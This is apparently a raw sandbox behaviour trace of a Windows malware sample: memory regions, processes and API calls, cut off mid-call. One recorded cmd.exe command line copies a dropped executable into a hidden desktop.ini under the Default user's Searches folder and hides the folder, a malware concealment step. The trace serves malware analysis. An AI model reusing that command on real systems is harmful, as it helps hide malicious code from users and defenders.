0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32155 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 32156 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 749 os_tid = 0xbf0 Thread: id = 750 os_tid = 0xbf8 Process: id = "548" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea166c0" os_pid = "0xbdc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "546" os_parent_pid = "0x53c" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\Default\\Searches\\Everywhere.search-ms\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32157 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32158 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32159 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32160 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 32161 start_va = 0xf60000 end_va = 0xf66fff entry_point = 0xf60000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 32162 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32163 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32164 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32165 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 32166 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32167 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32168 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32169 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32170 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 32171 start_va = 0x420000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 32172 start_va = 0x71e30000 end_va = 0x71e4cfff entry_point = 0x71e30000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 32173 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32174 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 32175 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32176 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32177 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 32178 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32179 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32180 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32181 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 32182 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32183 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32184 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 32185 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32186 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 751 os_tid = 0xb9c Process: id = "549" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16bc0" os_pid = "0x40c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\Searches\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\Searches\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\Searches\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Searches\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Searches\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 32207 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 32208 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 32209 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 32210 start_va = 0x1d0000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 32211 start_va = 0x4a350000 end_va = 0x4a39bfff entry_point = 0x4a350000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 32212 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 32213 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 32214 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 32215 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 32216 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 32265 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 32266 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 32267 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 32268 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 32269 start_va = 0x6b0000 end_va = 0x6bffff entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 32270 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 32271 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 32272 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 32273 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 32274 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 32275 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 32276 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 32277 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 32278 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 32279 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 32280 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 32281 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 32282 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 32283 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 32284 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 32285 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 32286 start_va = 0x2d0000 end_va = 0x3d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002d0000" filename = "" Region: id = 32287 start_va = 0x500000 end_va = 0x662fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 32288 start_va = 0x6c0000 end_va = 0x12bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 32289 start_va = 0x12c0000 end_va = 0x158efff entry_point = 0x12c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 754 os_tid = 0xb78 [0216.661] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2cfb1c | out: lpSystemTimeAsFileTime=0x2cfb1c*(dwLowDateTime=0xb5efd740, dwHighDateTime=0x1d440a9)) [0216.661] GetCurrentProcessId () returned 0x40c [0216.661] GetCurrentThreadId () returned 0xb78 [0216.661] GetTickCount () returned 0x3c995 [0216.661] QueryPerformanceCounter (in: lpPerformanceCount=0x2cfb14 | out: lpPerformanceCount=0x2cfb14*=27344994537) returned 1 [0216.661] GetModuleHandleA (lpModuleName=0x0) returned 0x4a350000 [0216.661] __set_app_type (_Type=0x1) [0216.661] __p__fmode () returned 0x76b331f4 [0216.661] __p__commode () returned 0x76b331fc [0216.661] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a3721a6) returned 0x0 [0216.662] __getmainargs (in: _Argc=0x4a374238, _Argv=0x4a374240, _Env=0x4a37423c, _DoWildCard=0, _StartInfo=0x4a374140 | out: _Argc=0x4a374238, _Argv=0x4a374240, _Env=0x4a37423c) returned 0 [0216.662] GetCurrentThreadId () returned 0xb78 [0216.662] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb78) returned 0x38 [0216.662] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0216.662] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0216.662] SetThreadUILanguage (LangId=0x0) returned 0x409 [0216.662] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0216.662] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2cfaac | out: phkResult=0x2cfaac*=0x0) returned 0x2 [0216.662] VirtualQuery (in: lpAddress=0x2cfae3, lpBuffer=0x2cfa7c, dwLength=0x1c | out: lpBuffer=0x2cfa7c*(BaseAddress=0x2cf000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0216.662] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x2cfa7c, dwLength=0x1c | out: lpBuffer=0x2cfa7c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0216.662] VirtualQuery (in: lpAddress=0x1d1000, lpBuffer=0x2cfa7c, dwLength=0x1c | out: lpBuffer=0x2cfa7c*(BaseAddress=0x1d1000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0216.662] VirtualQuery (in: lpAddress=0x1d3000, lpBuffer=0x2cfa7c, dwLength=0x1c | out: lpBuffer=0x2cfa7c*(BaseAddress=0x1d3000, AllocationBase=0x1d0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0216.663] VirtualQuery (in: lpAddress=0x2d0000, lpBuffer=0x2cfa7c, dwLength=0x1c | out: lpBuffer=0x2cfa7c*(BaseAddress=0x2d0000, AllocationBase=0x2d0000, AllocationProtect=0x2, RegionSize=0x101000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0216.663] GetConsoleOutputCP () returned 0x1b5 [0216.663] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a374260 | out: lpCPInfo=0x4a374260) returned 1 [0216.663] SetConsoleCtrlHandler (HandlerRoutine=0x4a36e72a, Add=1) returned 1 [0216.663] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.663] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0216.663] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.663] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a3741ac | out: lpMode=0x4a3741ac) returned 1 [0216.663] _get_osfhandle (_FileHandle=1) returned 0x7 [0216.663] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0216.663] _get_osfhandle (_FileHandle=0) returned 0x3 [0216.663] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a3741b0 | out: lpMode=0x4a3741b0) returned 1 [0216.663] _get_osfhandle (_FileHandle=0) returned 0x3 [0216.663] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0216.664] GetEnvironmentStringsW () returned 0x410418* [0216.664] FreeEnvironmentStringsW (penv=0x410418) returned 1 [0216.664] GetEnvironmentStringsW () returned 0x410418* [0216.664] FreeEnvironmentStringsW (penv=0x410418) returned 1 [0216.664] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cea1c | out: phkResult=0x2cea1c*=0x40) returned 0x0 [0216.664] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cea24, lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x0, lpData=0x2cea28*=0xc8, lpcbData=0x2cea20*=0x1000) returned 0x2 [0216.664] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cea24, lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x4, lpData=0x2cea28*=0x1, lpcbData=0x2cea20*=0x4) returned 0x0 [0216.664] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cea24, lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x0, lpData=0x2cea28*=0x1, lpcbData=0x2cea20*=0x1000) returned 0x2 [0216.664] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cea24, lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x4, lpData=0x2cea28*=0x0, lpcbData=0x2cea20*=0x4) returned 0x0 [0216.664] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cea24, lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x4, lpData=0x2cea28*=0x40, lpcbData=0x2cea20*=0x4) returned 0x0 [0216.664] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cea24, lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x4, lpData=0x2cea28*=0x40, lpcbData=0x2cea20*=0x4) returned 0x0 [0216.664] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cea24, lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x0, lpData=0x2cea28*=0x40, lpcbData=0x2cea20*=0x1000) returned 0x2 [0216.664] RegCloseKey (hKey=0x40) returned 0x0 [0216.664] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2cea1c | out: phkResult=0x2cea1c*=0x40) returned 0x0 [0216.664] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2cea24, lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x0, lpData=0x2cea28*=0x40, lpcbData=0x2cea20*=0x1000) returned 0x2 [0216.664] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2cea24, lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x4, lpData=0x2cea28*=0x1, lpcbData=0x2cea20*=0x4) returned 0x0 [0216.664] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2cea24, lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x0, lpData=0x2cea28*=0x1, lpcbData=0x2cea20*=0x1000) returned 0x2 [0216.664] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2cea24, lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x4, lpData=0x2cea28*=0x0, lpcbData=0x2cea20*=0x4) returned 0x0 [0216.664] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2cea24, lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x4, lpData=0x2cea28*=0x9, lpcbData=0x2cea20*=0x4) returned 0x0 [0216.664] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2cea24, lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x4, lpData=0x2cea28*=0x9, lpcbData=0x2cea20*=0x4) returned 0x0 [0216.665] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2cea24, lpData=0x2cea28, lpcbData=0x2cea20*=0x1000 | out: lpType=0x2cea24*=0x0, lpData=0x2cea28*=0x9, lpcbData=0x2cea20*=0x1000) returned 0x2 [0216.665] RegCloseKey (hKey=0x40) returned 0x0 [0216.665] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863b2 [0216.665] srand (_Seed=0x5b8863b2) [0216.665] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\Searches\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\Searches\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\Searches\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Searches\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Searches\"" [0216.665] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\Default\\Searches\\desktop.ini\" & del /f /q \"C:\\Users\\Default\\Searches\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\Default\\Searches\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Searches\\desktop.ini\" && attrib +h \"C:\\Users\\Default\\Searches\"" [0216.665] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a375260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.665] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x411b78, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0216.665] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0216.665] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0216.665] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0216.665] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0216.665] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0216.665] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0216.665] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0216.665] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0216.665] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0216.665] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0216.666] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0216.666] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0216.666] GetEnvironmentStringsW () returned 0x412568* [0216.666] FreeEnvironmentStringsW (penv=0x412568) returned 1 [0216.666] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0216.666] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a380640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0216.666] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0216.666] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0216.666] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0216.666] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0216.666] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0216.666] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0216.666] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0216.666] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0216.666] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2cf7e8 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0216.666] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2cf7e8, lpFilePart=0x2cf7e4 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2cf7e4*="Desktop") returned 0x18 [0216.666] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0216.666] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2cf564 | out: lpFindFileData=0x2cf564) returned 0x410bf8 [0216.666] FindClose (in: hFindFile=0x410bf8 | out: hFindFile=0x410bf8) returned 1 [0216.666] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2cf564 | out: lpFindFileData=0x2cf564) returned 0x410bf8 [0216.667] FindClose (in: hFindFile=0x410bf8 | out: hFindFile=0x410bf8) returned 1 [0216.667] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2cf564 | out: lpFindFileData=0x2cf564) returned 0x410bf8 [0216.667] FindClose (in: hFindFile=0x410bf8 | out: hFindFile=0x410bf8) returned 1 [0216.667] GetFileAttributesW 